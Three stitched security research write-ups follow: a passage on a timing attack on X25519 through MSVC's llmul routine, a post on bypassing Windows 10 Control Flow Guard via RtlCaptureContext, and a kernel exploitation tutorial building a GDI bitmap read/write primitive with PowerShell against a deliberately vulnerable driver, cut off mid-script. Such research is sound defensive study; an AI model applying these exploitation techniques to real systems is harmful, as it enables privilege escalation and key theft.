getTicksEnd();
start = getTicksBeginning();
// Code to be measured
end = getTicksEnd();

With:

unsigned long getTicksBeginning() {
    unsigned long time;
    __asm {
        cpuid          // Force in-order execution
        rdtsc          // eax = counter time
        mov time, eax  // time = eax
    };
    return time;
}

unsigned long getTicksEnd() {
    unsigned long time;
    __asm {
        rdtscp         // eax = counter time
        mov time, eax  // time = eax
        cpuid          // Force in-order execution
    };
    return time;
}

The computation was executed and timed locally on a Sandy Bridge 64-bit Windows 7 PC with an Intel i5-2400 processor: 3.1 GHz, 4 cores, 4 threads. It should be noted that the code of the curve was compiled for 32-bit architectures using MSVC 2015.

Timing Leakage

A dependence of the computation time on the input value can be revealed by comparing the timings obtained by computing the scalar multiplication multiple times with the same key against the timings of multiplications with different keys. The results are shown in Figure 2.

Figure 2.
Computation times depending on the key. The computation times of the multiplication with the same key are shown in grey and the timings of the multiplications with different keys are shown in orange. We can see that the timing distribution of the orange crosses varies much more than that of the grey pluses.

The second part of the attack consists of finding the origin of the leakage and seeing whether it is exploitable. Looking carefully at the assembly code we discover that the timing leakage is coming from a run-time library of Windows: llmul (see code below). These assembly instructions perform the multiplication of two 64-bit integers. Here the timing difference is introduced when the 32 most significant bits (MSB) of both operands of the multiplication are all zero. In this case the multiplication of the 32 MSB is omitted, as shown in orange in the following code:

        title   llmul - long multiply routine
;***
;llmul.asm - long multiply routine
;
;       Copyright (c) Microsoft Corporation. All rights reserved.
;
;Purpose:
;       Defines long multiply routine
;       Both signed and unsigned routines are the same, since multiply's
;       work out the same in 2's complement
;       creates the following routine:
;           __allmul
;************************************************************************

.xlist
include vcruntime.inc
include mm.inc
.list

CODESEG

_allmul PROC NEAR
.FPO (0, 4, 0, 0, 0, 0)

A       EQU     [esp + 4]       ; stack address of a
B       EQU     [esp + 12]      ; stack address of b

        mov     eax,HIWORD(A)
        mov     ecx,HIWORD(B)
        or      ecx,eax         ;test for both hiwords zero.
        mov     ecx,LOWORD(B)
        jnz     short hard      ;both are zero, just mult ALO and BLO
        mov     eax,LOWORD(A)
        mul     ecx
        ret     16              ; callee restores the stack

hard:
        push    ebx
.FPO (1, 4, 0, 0, 0, 0)

A2      EQU     [esp + 8]       ; stack address of a
B2      EQU     [esp + 16]      ; stack address of b

        mul     ecx             ;eax has AHI, ecx has BLO, so AHI * BLO
        mov     ebx,eax         ;save result
        mov     eax,LOWORD(A2)
        mul     dword ptr HIWORD(B2) ;ALO * BHI
        add     ebx,eax         ;ebx = ((ALO * BHI) + (AHI * BLO))
        mov     eax,LOWORD(A2)  ;ecx = BLO
        mul     ecx             ;so edx:eax = ALO*BLO
        add     edx,ebx         ;now edx has all the LO*HI stuff
        pop     ebx
        ret     16              ; callee restores the stack

_allmul ENDP
        end

This function is called from the function fscalar_product, which simply computes the multiplication of the coefficients with a constant integer. The type limb is a 64-bit integer.

static void fscalar_product(limb *output, const limb *in, const limb scalar) {
  unsigned i;
  for (i = 0; i < 10; ++i) {
    output[i] = in[i] * scalar;
  }
}

In the elliptic curve implementation the 32 MSB of the coefficients are non-zero only when the coefficients are negative (two's complement is used to represent the negative numbers). Thus we can say that it takes more time to process a negative coefficient than a positive one. To corroborate this finding, let's compare the timing measurements for negative and positive coefficients:

Figure 3. Comparison of timings for positive and negative coefficients.

It can be seen that on average the multiplications with negative coefficients take more time than those with positive coefficients. The next step is to mount an attack taking advantage of this leakage. We need to find a link between the key bit processing time (where the leakage appears) and the overall computation time that we can measure.
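The branch condition in llmul can be restated as a one-line predicate. The sketch below (a Python model, not production code) shows why negative limbs hit the slow path: two's-complement encoding sets the high dword of any negative 64-bit value.

```python
MASK_HI = 0xFFFFFFFF00000000

def llmul_takes_fast_path(a, b):
    """llmul skips the 32x32 high-word multiplications only when the
    32 most significant bits of BOTH 64-bit operands are zero."""
    return (a & MASK_HI) == 0 and (b & MASK_HI) == 0

def to_u64(x):
    """Two's-complement encoding of a signed coefficient as 64 bits."""
    return x & 0xFFFFFFFFFFFFFFFF

# A small positive limb keeps the high dword clear -> fast path.
assert llmul_takes_fast_path(to_u64(123456), to_u64(97))
# A negative limb sets the high dword (two's complement) -> slow path.
assert not llmul_takes_fast_path(to_u64(-123456), to_u64(97))
```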
To do so, the idea is to decompose the overall computation time into the time to process the targeted key bit k_j, plus the time to process the key bits before it and the key bits after it, for a given base point P:

    T(P) = t(k_j, P) + t(other key bits, P)

We can make the assumption that the time to process the bits other than the targeted key bit k_j is random (Gaussian). Then, averaged over N executions, this contribution tends to a constant, and it follows that for two sets of base points A and B:

    if mean_{P in A} t(k_j, P) > mean_{P in B} t(k_j, P), then mean_{P in A} T(P) > mean_{P in B} T(P)

With base points selected at random in the sets A and B, comparing the averages only tells us that on average the processing of the key bit k_j took more time with the base points in A than with those in B. We have to select the base points in a way that allows the differentiation of the value of k_j. Let's define two sets:

P0: the set of base points causing more negative coefficients in the polynomial representing the coordinate of the point being added in the Montgomery ladder when k_j = 0
P1: the set of base points causing more negative coefficients in the polynomial representing the coordinate of the point being added in the Montgomery ladder when k_j = 1

Then the mean timing over P1 exceeds the mean timing over P0 when k_j = 1, and the opposite holds otherwise. We have found a link between the leakage and the key bit values. The timing attack can be performed.

Timing Attack

As the timing measurements can vary significantly for the same execution depending on the processes handled by the processor, the measurements have to be repeated many times. The idea is to perform the attack bit by bit and construct the key sequentially from the bits found. For each bit of the key, the algorithm is the following: find 200 base points in P0 and 200 in P1. To do so, we simply select base points (integers) at random and count the number of negative coefficients in the polynomial representing the coordinate of the point being added for the key bit we are interested in. For that we use the key constructed from the previous bits found, and the computation is done locally. Then measure the timings for every base point.
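The distinguishing step can be illustrated with a toy simulation. This is not tied to the real measurements in any way: the constants, noise distribution, and the one-unit leakage are made up purely to show that averaging separates the two point sets when the targeted bit contributes a small systematic delay.

```python
import random

random.seed(7)

def simulate_timing(secret_bit, point_set, n=2000):
    """Toy model: processing the targeted key bit costs one extra time
    unit when the base point provokes negative coefficients for that
    bit value, on top of Gaussian noise from all the other bits."""
    extra = 1.0 if secret_bit == point_set else 0.0
    return sum(random.gauss(100.0, 5.0) + extra for _ in range(n)) / n

secret_bit = 1
mean_P0 = simulate_timing(secret_bit, 0)  # points slow when bit == 0
mean_P1 = simulate_timing(secret_bit, 1)  # points slow when bit == 1
guessed_bit = 1 if mean_P1 > mean_P0 else 0
assert guessed_bit == secret_bit
```

With 2000 samples per set the noise on each mean (about 5/sqrt(2000)) is an order of magnitude below the injected one-unit signal, so the comparison of means recovers the bit reliably.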
To measure, each timing is repeated 25,000 times (a number found empirically) and we take the 15 minimum values among them, then average those 15 timings. Finally, we take the mean of the timings of the base points in P0 and the mean of the base points in P1 and compare those two values. These steps are repeated for the same key bit until we get the same value twice, so in the worst case the algorithm is repeated three times per bit of the key.

Results

The attack was successfully performed locally. An example of timings is shown in Figure 3.

Figure 3. Comparison of the means of P0 and P1.

It should be noted that the attack takes about 1 month to recover the entire key in our setup: 25,000 measurements take about 15 seconds, there are 400 base points, the measurements can be repeated up to three times, and 251 key bits have to be recovered. Once a bit is wrongly recovered, the following bits cannot be trusted, as we then select the base points for a wrong key. In order to test the feasibility on the Internet, some communication delays were added to the measurements. The attack was still successful. Several optimizations could be implemented: for example, feedback on the key bits found, brute force once only a few key bits remain to be recovered, parameter optimization, etc. However, the purpose of this work was not to exploit the weakness in this specific implementation.

Conclusion

Simply following the recommendations of the RFC and having a "constant-time" source code is not sufficient to prevent timing leakage. Once a security design is implemented, whatever effort is put into protecting each part of the code, there still remains a strong possibility of a timing leak. It is virtually impossible to have control over all the parameters at stake. Compiler and processor optimizations, processor specificity, hardware construction, and run-time libraries are all examples of elements that cannot be predicted when implementing at a high level.
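The repeat-and-keep-the-minima aggregation described above can be sketched as follows. This toy model is not tied to rdtsc; it only relies on the observation that scheduling noise is one-sided (it can only add time), so the smallest samples are closest to the true cost. The constants are illustrative.

```python
import random

random.seed(1)

def robust_time(sample_once, repeats=25000, keep=15):
    """Repeat a noisy timing measurement, keep the `keep` smallest
    values, and return their average. Minima filter out OS noise,
    which only ever inflates a measurement."""
    samples = sorted(sample_once() for _ in range(repeats))
    return sum(samples[:keep]) / keep

# Toy measurement: true cost 100 plus one-sided scheduling noise.
measure = lambda: 100.0 + abs(random.gauss(0.0, 20.0))
estimate = robust_time(measure, repeats=5000, keep=15)
assert abs(estimate - 100.0) < 5.0  # the minima sit near the true cost
```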
The attack developed shows that the effects of these low-level actors can be exploited practically against the curve X25519: it is not only theoretically possible to find weaknesses, they can be found and exploited in a reasonable amount of time. Nevertheless, the idea of ensuring that the design itself is secure by using a formalized approach such as an RFC is an important step in minimizing the side-channel leakage of any final system. This attack also highlighted a potential weakness induced by the Windows run-time library: all code compiled in 32-bit mode with MSVC on 64-bit architectures will call llmul every time a 64-bit multiplication is executed.

Source: https://research.kudelskisecurity.com/2017/01/16/when-constant-time-source-may-not-save-you/
January 16, 2017
Bypassing Control Flow Guard in Windows 10
Morten Schenk

This blog post is the result of some research I did back in July of 2016 but did not have the possibility to publish before now. In June of 2016 Theori published a blog post on an Internet Explorer vulnerability which was patched in MS16-063. The exploit they wrote was for Internet Explorer 11 on Windows 7, and as their own blog post indicates, the exploit will not work on Windows 10 due to the mitigation technology called Control Flow Guard. This blog post describes how I ported the exploit to Windows 10 and bypassed CFG. In fact I found another method as well, which will be posted in an upcoming blog post.

Understanding the Enemy – Control Flow Guard

Control Flow Guard (CFG) is a mitigation implemented by Microsoft in Windows 8.1 Update 3 and Windows 10 which attempts to protect indirect calls at the assembly level. Trend Micro has published a good analysis of how CFG is implemented on Windows 10. There have already been several bypasses published for CFG, but most of the previous ones have targeted the CFG implementation algorithms themselves, while I wanted to look at weaknesses in the functionality. As Theori wrote in their blog post, the exploit technique from Windows 7 will not work due to the presence of CFG, so let us look closer at why and try to understand a way around it. The exploit code from the Theori github works on Internet Explorer on Windows 10 up until the overwritten virtual function table is called. So, we are left with the question of how to leverage the arbitrary read/write primitive to bypass CFG.
According to the research by Trend Micro, CFG is invoked through the function LdrpValidateUserCallTarget, which validates whether a function is valid to use in an indirect call. It looks like this:

The pointer loaded into EDX is the base pointer of the validation bitmap, which in this case is:

Then the function being validated has its address loaded into ECX; if kernel32!VirtualProtectStub is taken as an example, then the address in this case is:

The address is then right-shifted 8 bits and used to load the DWORD which holds the validation bit for that address, in this case:

The function address is then bit-shifted 3 to the right and a bit test is performed. This essentially does a modulo 0x20 on the bit-shifted address, which gives the bit to be checked in the DWORD from the validation bitmap, so in this case:

So the relevant bit is at offset 0x14 in:

Which means that it is valid, so VirtualProtect is a valid calling address. However, this does not really solve the problem: the arguments for it must be supplied by the attacker as well. Normally this is done in a ROP chain, but any bytes not stemming from the beginning of a function are not valid. So, the solution is to find a function which may be called where the arguments can be controlled and whose functionality gives the attacker an advantage. This requires us to look closer at the exploit.

Exploit on Windows 10

In the exploit supplied by Theori, code execution is achieved by overwriting the virtual function table of the TypedArray with a stack pivot gadget. Since this is no longer possible, it is worth looking into the functions available to a TypedArray, and while doing this the following two functions seem interesting:

They are at offsets 0x7C and 0x188. They are interesting since they can be called directly from JavaScript code, and HasItem has one user-controlled parameter while Subarray has two user-controlled parameters. The issue, however, is that neither of them returns any data other than Booleans.
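The index computation performed by LdrpValidateUserCallTarget can be sketched in a few lines. This mirrors only the shifts described above (32-bit layout); the sample address is hypothetical, chosen so its low bits reproduce the article's bit offset of 0x14:

```python
def cfg_bitmap_position(func_addr):
    """Mirror LdrpValidateUserCallTarget's lookup: the target address
    selects a DWORD in the validation bitmap via addr >> 8, and a bit
    inside that DWORD via (addr >> 3) mod 0x20 (the bt instruction
    performs the mod-0x20 implicitly)."""
    dword_index = func_addr >> 8
    bit_index = (func_addr >> 3) & 0x1F
    return dword_index, bit_index

# Hypothetical address standing in for kernel32!VirtualProtectStub.
addr = 0x765308A0
dword_index, bit_index = cfg_bitmap_position(addr)
assert bit_index == 0x14  # matches the bit offset seen in the article
```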
The question is then which function to overwrite them with; furthermore, the chosen function must take the same number of arguments, otherwise the stack will be misaligned on return, which will raise an exception. The APIs I searched for should leak a pointer to the stack, which could then be used to overwrite a return address, thus bypassing CFG. The API I located is RtlCaptureContext, which is present in kernel32.dll, kernelbase.dll and ntdll.dll. The API takes one argument, a pointer to a CONTEXT structure, as shown on MSDN:

A CONTEXT structure holds a dump of all the registers including ESP; furthermore, the input value is just a pointer to a buffer which can hold the data. Looking at the layout of a TypedArray object, the following appears:

The first DWORD is the vtable pointer, which can be overwritten to create a fake vtable holding the address of the RtlCaptureContext API at offset 0x7C, while the DWORD at offset 0x20 is the pointer to the actual data of the TypedArray, whose size is user-controlled:

Since it is also possible to leak the address of this buffer, it can serve as the parameter for RtlCaptureContext. To accomplish this, a fake vtable now has to be created with a pointer to ntdll!RtlCaptureContext at offset 0x7C. That means leaking the address of RtlCaptureContext, which in turn means leaking the address of ntdll.dll. The default route would be to use the address of the vtable, which is a pointer into jscript9.dll:

From this pointer, iterate back 0x1000 bytes at a time looking for the MZ header, then go through the import table looking for a pointer into kernelbase.dll. Do the same for that pointer to gain the base address of kernelbase.dll, then look at its import table for a pointer into ntdll.dll, again get the base address, and finally look up the exported functions to find RtlCaptureContext.
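The walk-back-to-MZ step can be sketched as follows. This is a minimal model, assuming only an arbitrary-read primitive (here mocked by a dictionary-backed `read_u16`) and a module mapped at a page-aligned base; the addresses are made up for illustration:

```python
PAGE = 0x1000

def find_module_base(read_u16, leaked_ptr):
    """Walk backwards one page at a time from a leaked in-module
    pointer until the 'MZ' magic of the PE header is found. `read_u16`
    stands in for the exploit's arbitrary-read primitive."""
    addr = leaked_ptr & ~(PAGE - 1)     # page-align the leaked pointer
    while read_u16(addr) != 0x5A4D:     # 'MZ' read little-endian
        addr -= PAGE
    return addr

# Mock address space: a module mapped at 0x6F000000 with an MZ header.
memory = {0x6F000000: 0x5A4D}
read_u16 = lambda a: memory.get(a, 0)
assert find_module_base(read_u16, 0x6F012345) == 0x6F000000
```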
While this method is perfectly valid, it does have a drawback: if EMET is installed on the system it will trigger a crash, since code coming from jscript9.dll (which our read/write primitive does) is not allowed to read data from the PE header or to go through the export table. To get around that I used a different technique. Remember that every indirect call protected by CFG calls ntdll!LdrpValidateUserCallTarget, and since jscript9.dll is protected by CFG, any function with an indirect call contains a pointer directly into ntdll.dll. One such function is at offset 0x10 in the vtable:

Using the read primitive, the pointer to ntdll.dll may then be found through the following function:

Going from a pointer into ntdll.dll to the address of RtlCaptureContext without looking at the export tables may be accomplished by using the read primitive to search for a signature or hash. RtlCaptureContext looks like this:

The first 0x30 bytes always stay the same and are pretty unique, so when added together they may be used as a collision-free hash, as seen below:

The function takes a pointer into ntdll.dll as its argument. Putting all of this together gives:

From here, offset 0x200 of the buffer contains the results from RtlCaptureContext; viewing it shows:

From the above it is clear that stack pointers have been leaked; it is now a matter of finding an address to overwrite which will give execution control. Looking at the top of the stack shows:

This is the current function's return address. It is placed at an offset of 0x40 bytes from the leaked stack pointer found at offset 0x9C in the RtlCaptureContext output. With a bit of luck this offset will be the same for other simple functions, so it should be possible to invoke the write primitive and make it overwrite its own return address, thus bypassing CFG.
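The additive-hash scan described above can be sketched like this. The addresses, prologue bytes, and hash value below are all mock data; the only idea taken from the article is summing the first 0x30 bytes of a function and scanning memory through the read primitive until the sum matches:

```python
def hash_window(read_u32, addr, length=0x30):
    """Sum `length` bytes at `addr` as little-endian DWORDs; the attack
    uses such an additive hash of RtlCaptureContext's first 0x30 bytes
    to locate it without touching the export table."""
    return sum(read_u32(addr + i) for i in range(0, length, 4)) & 0xFFFFFFFF

def find_function(read_u32, start, target_hash, max_scan=0x100000):
    """Scan forward from a leaked ntdll pointer until the hash matches."""
    for offset in range(0, max_scan, 4):
        if hash_window(read_u32, start + offset) == target_hash:
            return start + offset
    return None

# Mock memory: a fake "function" at 0x7C900340 with a known prologue.
mem = {0x7C900340 + i: 0x11111111 + i for i in range(0, 0x30, 4)}
read_u32 = lambda a: mem.get(a, 0)
target = hash_window(read_u32, 0x7C900340)
assert find_function(read_u32, 0x7C900000, target) == 0x7C900340
```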
The addition to the exploit is shown below:

Which, when run, does show EIP control:

Furthermore, the writes to offsets 0x40 and 0x44 are now placed at the top of the stack, which allows for creating a stack pivot and then a ROP chain; one way could be to use a POP EAX gadget followed by an XCHG EAX, ESP gadget.

Microsoft Mitigation

Microsoft has stated that CFG bypasses which corrupt return addresses on the stack are a known design limitation and hence not eligible for fixes or any kind of bug bounty, as shown here:

That said, Microsoft has done two things to mitigate this technique. First, in the upcoming version of Windows 10, Return Flow Guard will be implemented, which is seen as a way to stop stack corruptions from giving execution control. The other is the introduction of sensitive APIs in the Anniversary edition release of Windows 10; it only protects Microsoft Edge, so it would not help in this case, but it does block the RtlCaptureContext API on Microsoft Edge.

If you made it this far, thanks for reading. The proof of concept code can be found at: https://github.com/MortenSchenk/RtlCaptureContext-CFG-Bypass

Source: https://improsec.com/blog//bypassing-control-flow-guard-in-windows-10
Part 17: Kernel Exploitation -> GDI Bitmap Abuse (Win7-10 32/64bit)

Hello and welcome! We are, once again, diving into ring0 with @HackSysTeam's driver. In this post we will be revisiting the write-what-where vulnerability. By implementing a powerful ring0 read/write primitive we can create an exploit that works on Windows 7, 8, 8.1 and 10 (pre v1607) and targets both 32 and 64 bit architectures! As we will see, this technique is essentially a data attack, so we will painlessly circumvent SMEP/SMAP/CFG/RFG => winning! This technique is slightly "complicated" and requires some prior knowledge on the part of the reader, so I highly recommend that the resources below are reviewed before starting on this post. Finally, to keep things fresh, we will be developing our exploit on a 64-bit Windows 10 host. Enough introductory nonsense, let's get to it!

Resources:
+ HackSysTeam-PSKernelPwn (@FuzzySec) - here
+ Abusing GDI for ring0 exploit primitives (@CoreSecurity) - here
+ Abusing GDI Reloaded (@CoreSecurity) - here
+ This Time Font hunt you down in 4 bytes (@keen_lab) - here
+ Terminus Project (@rwfpl) - here

Recon the challenge

We are rehashing the write-what-where vulnerability from part 11 of this series, so we won't go over the entire analysis again. We just want to make sure our arbitrary write still works as expected on Win 10.
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;

public static class EVD
{
    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    public static extern IntPtr CreateFile(
        String lpFileName,
        UInt32 dwDesiredAccess,
        UInt32 dwShareMode,
        IntPtr lpSecurityAttributes,
        UInt32 dwCreationDisposition,
        UInt32 dwFlagsAndAttributes,
        IntPtr hTemplateFile);

    [DllImport("Kernel32.dll", SetLastError = true)]
    public static extern bool DeviceIoControl(
        IntPtr hDevice,
        int IoControlCode,
        byte[] InBuffer,
        int nInBufferSize,
        byte[] OutBuffer,
        int nOutBufferSize,
        ref int pBytesReturned,
        IntPtr Overlapped);
}
"@

$hDevice = [EVD]::CreateFile("\\.\HacksysExtremeVulnerableDriver", [System.IO.FileAccess]::ReadWrite,
    [System.IO.FileShare]::ReadWrite, [System.IntPtr]::Zero, 0x3, 0x40000080, [System.IntPtr]::Zero)

if ($hDevice -eq -1) {
    echo "`n[!] Unable to get driver handle..`n"
    Return
} else {
    echo "`n[>] Driver information.."
    echo "[+] lpFileName: \\.\HacksysExtremeVulnerableDriver"
    echo "[+] Handle: $hDevice"
}

[byte[]]$Buffer = [System.BitConverter]::GetBytes(0x4141414141414141) + [System.BitConverter]::GetBytes(0x4242424242424242)

echo "`n[>] Sending buffer.."
echo "[+] Buffer length: $($Buffer.Length)"
echo "[+] IOCTL: 0x22200B"
[EVD]::DeviceIoControl($hDevice, 0x22200B, $Buffer, $Buffer.Length, $null, 0, [ref]0, [System.IntPtr]::Zero) |Out-Null

We seem to get the expected result, as shown below. You may remember from part 11 that this is not entirely as it appears: the value we are writing is not in fact 0x4141414141414141, it is the pointer stored at that address. Also, our POC only works on 64-bit. We would do well to keep our exploit architecture-independent from the start! We can modify the buffer structure as shown below to get the arbitrary write we want on 32/64 bit.
# [IntPtr]$WriteWhatPtr->$WriteWhat + $WriteWhere
#---
[IntPtr]$WriteWhatPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.BitConverter]::GetBytes($WriteWhat).Length)
[System.Runtime.InteropServices.Marshal]::Copy([System.BitConverter]::GetBytes($WriteWhat), 0, $WriteWhatPtr, [System.BitConverter]::GetBytes($WriteWhat).Length)
if ($x32Architecture) {
    [byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt32()) + [System.BitConverter]::GetBytes($WriteWhere)
} else {
    [byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt64()) + [System.BitConverter]::GetBytes($WriteWhere)
}

As long as we pass in the appropriate variables, this should now work universally. Pwn all the things!

Game Plan

That's the easy part done. What we want to do now is turn a single arbitrary write into a full ring0 read/write primitive. At a high level we will (1) create two bitmap objects, (2) leak their respective kernel addresses, (3) use our arbitrary write to modify a header element of one of the bitmap objects and (4) use the Gdi32 GetBitmapBits/SetBitmapBits API calls to read from and write to kernel space!

Leaking Bitmap Kernel Objects

The crucial part of this technique is that, when creating a bitmap, we can leak the address of the bitmap object in the kernel. This leak was patched by Microsoft in v1607 of Windows 10 (aka the Anniversary patch) => crycry. As it turns out, when a bitmap is created, a struct is added to the GdiSharedHandleTable in the parent process PEB. Given the base address of the process PEB, the GdiSharedHandleTable is located at the following offsets (32/64 bit respectively):

[StructLayout(LayoutKind.Explicit, Size = 256)]
public struct _PEB
{
    [FieldOffset(148)] public IntPtr GdiSharedHandleTable32;
    [FieldOffset(248)] public IntPtr GdiSharedHandleTable64;
}

This PEB entry is simply a pointer to an array of GDICELL structs which describe a number of different image types. The definition of this struct can be seen below.
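The architecture-aware buffer layout above can be restated compactly. This Python sketch only mirrors the byte layout the PowerShell builds (pointer-to-what followed by where, each at the target's pointer width); it is an illustration, not part of the exploit:

```python
import struct

def www_buffer(what_ptr, where, arch64):
    """Lay out the write-what-where input buffer: a pointer to the
    value to write, followed by the destination address, both sized
    to the target's pointer width."""
    fmt = "<QQ" if arch64 else "<II"
    return struct.pack(fmt, what_ptr, where)

buf64 = www_buffer(0x4141414141414141, 0x4242424242424242, arch64=True)
buf32 = www_buffer(0x41414141, 0x42424242, arch64=False)
assert len(buf64) == 16 and len(buf32) == 8
```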
/// 32bit size: 0x10
/// 64bit size: 0x18
[StructLayout(LayoutKind.Sequential)]
public struct _GDI_CELL
{
    public IntPtr pKernelAddress;
    public UInt16 wProcessId;
    public UInt16 wCount;
    public UInt16 wUpper;
    public UInt16 wType;
    public IntPtr pUserAddress;
}

Let's use the following POC to see if we can manually find the _GDI_CELL struct in KD.

Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;

public static class EVD
{
    [DllImport("gdi32.dll")]
    public static extern IntPtr CreateBitmap(
        int nWidth,
        int nHeight,
        uint cPlanes,
        uint cBitsPerPel,
        IntPtr lpvBits);
}
"@

[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)
$Bitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)
"{0:X}" -f [int]$Bitmap

We run the POC and get back a bitmap handle. Immediately it seems obvious that this is not a standard handle value returned by so many Windows API calls (it is much too large). In fact, thanks to no cleverness on my part, the last two bytes of a bitmap handle are actually the index of its struct in the GdiSharedHandleTable array (=> handle & 0xffff). Knowing this, let's jump into KD and see if we can find the _GDI_CELL struct for our newly created bitmap!

With the pointer to the GdiSharedHandleTable array, all we need to do is add the struct index times the struct size (0x18 on 64-bit). Process Hacker has a very useful feature which allows us to list GDI object handles. We can use this to confirm the values we found in KD. Sw33t!

For our ring0 primitive we need to collect this information programmatically for two bitmaps (a manager and a worker). As we saw, it's just some simple math based on the bitmap handle. The only question is how do we get the base address of the process PEB. Fortunately the undocumented NtQueryInformationProcess function comes to the rescue.
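The index math above can be sketched in a few lines. The table base and handle value here are hypothetical (not from a live session); the struct sizes come from the _GDI_CELL comments above:

```python
GDI_CELL_SIZE_64 = 0x18   # sizeof(_GDI_CELL) on 64-bit
GDI_CELL_SIZE_32 = 0x10   # sizeof(_GDI_CELL) on 32-bit

def gdicell_address(table_base, bitmap_handle, arch64=True):
    """Address of a bitmap's _GDI_CELL entry: the low 16 bits of the
    handle index into the GdiSharedHandleTable array in the PEB."""
    index = bitmap_handle & 0xFFFF
    size = GDI_CELL_SIZE_64 if arch64 else GDI_CELL_SIZE_32
    return table_base + index * size

# Hypothetical values for illustration only.
table = 0x13F0000
handle = 0x8305154F        # => index 0x154F
assert gdicell_address(table, handle) == table + 0x154F * 0x18
```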
When called with the ProcessBasicInformation class (0x0), the function returns a struct which contains the base address of the PEB. I won't go into further detail on this as it is a well-understood technique; hopefully the POC below will clear up any doubts!

Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;

[StructLayout(LayoutKind.Sequential)]
public struct _PROCESS_BASIC_INFORMATION
{
    public IntPtr ExitStatus;
    public IntPtr PebBaseAddress;
    public IntPtr AffinityMask;
    public IntPtr BasePriority;
    public UIntPtr UniqueProcessId;
    public IntPtr InheritedFromUniqueProcessId;
}

/// Partial _PEB
[StructLayout(LayoutKind.Explicit, Size = 256)]
public struct _PEB
{
    [FieldOffset(148)] public IntPtr GdiSharedHandleTable32;
    [FieldOffset(248)] public IntPtr GdiSharedHandleTable64;
}

[StructLayout(LayoutKind.Sequential)]
public struct _GDI_CELL
{
    public IntPtr pKernelAddress;
    public UInt16 wProcessId;
    public UInt16 wCount;
    public UInt16 wUpper;
    public UInt16 wType;
    public IntPtr pUserAddress;
}

public static class EVD
{
    [DllImport("ntdll.dll")]
    public static extern int NtQueryInformationProcess(
        IntPtr processHandle,
        int processInformationClass,
        ref _PROCESS_BASIC_INFORMATION processInformation,
        int processInformationLength,
        ref int returnLength);

    [DllImport("gdi32.dll")]
    public static extern IntPtr CreateBitmap(
        int nWidth,
        int nHeight,
        uint cPlanes,
        uint cBitsPerPel,
        IntPtr lpvBits);
}
"@

#==============================================[PEB]
# Flag architecture $x32Architecture/!$x32Architecture
if ([System.IntPtr]::Size -eq 4) {
    echo "`n[>] Target is 32-bit!"
    $x32Architecture = 1
} else {
    echo "`n[>] Target is 64-bit!"
}

# Current Proc handle
$ProcHandle = (Get-Process -Id ([System.Diagnostics.Process]::GetCurrentProcess().Id)).Handle

# Process Basic Information
$PROCESS_BASIC_INFORMATION = New-Object _PROCESS_BASIC_INFORMATION
$PROCESS_BASIC_INFORMATION_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($PROCESS_BASIC_INFORMATION)
$returnLength = New-Object Int
$CallResult = [EVD]::NtQueryInformationProcess($ProcHandle, 0, [ref]$PROCESS_BASIC_INFORMATION, $PROCESS_BASIC_INFORMATION_Size, [ref]$returnLength)

# PID & PEB address
echo "`n[?] PID $($PROCESS_BASIC_INFORMATION.UniqueProcessId)"
if ($x32Architecture) {
    echo "[+] PebBaseAddress: 0x$("{0:X8}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt32())"
} else {
    echo "[+] PebBaseAddress: 0x$("{0:X16}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64())"
}

# Lazy PEB parsing
$_PEB = New-Object _PEB
$_PEB = $_PEB.GetType()
$BufferOffset = $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64()
$NewIntPtr = New-Object System.Intptr -ArgumentList $BufferOffset
$PEBFlags = [system.runtime.interopservices.marshal]::PtrToStructure($NewIntPtr, [type]$_PEB)

# GdiSharedHandleTable
if ($x32Architecture) {
    echo "[+] GdiSharedHandleTable: 0x$("{0:X8}" -f $PEBFlags.GdiSharedHandleTable32.ToInt32())"
} else {
    echo "[+] GdiSharedHandleTable: 0x$("{0:X16}" -f $PEBFlags.GdiSharedHandleTable64.ToInt64())"
}

# _GDI_CELL size
$_GDI_CELL = New-Object _GDI_CELL
$_GDI_CELL_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($_GDI_CELL)
#==============================================[/PEB]

#==============================================[Bitmap]
echo "`n[>] Creating Bitmaps.."
# Manager Bitmap
[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)
$ManagerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)
echo "[+] Manager BitMap handle: 0x$("{0:X}" -f [int]$ManagerBitmap)"
if ($x32Architecture) {
    $HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size)
    echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)"
    $ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)
    echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))"
} else {
    $HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size)
    echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)"
    $ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)
    echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))"
}

# Worker Bitmap
[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)
$WorkerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)
echo "[+] Worker BitMap handle: 0x$("{0:X}" -f [int]$WorkerBitmap)"
if ($x32Architecture) {
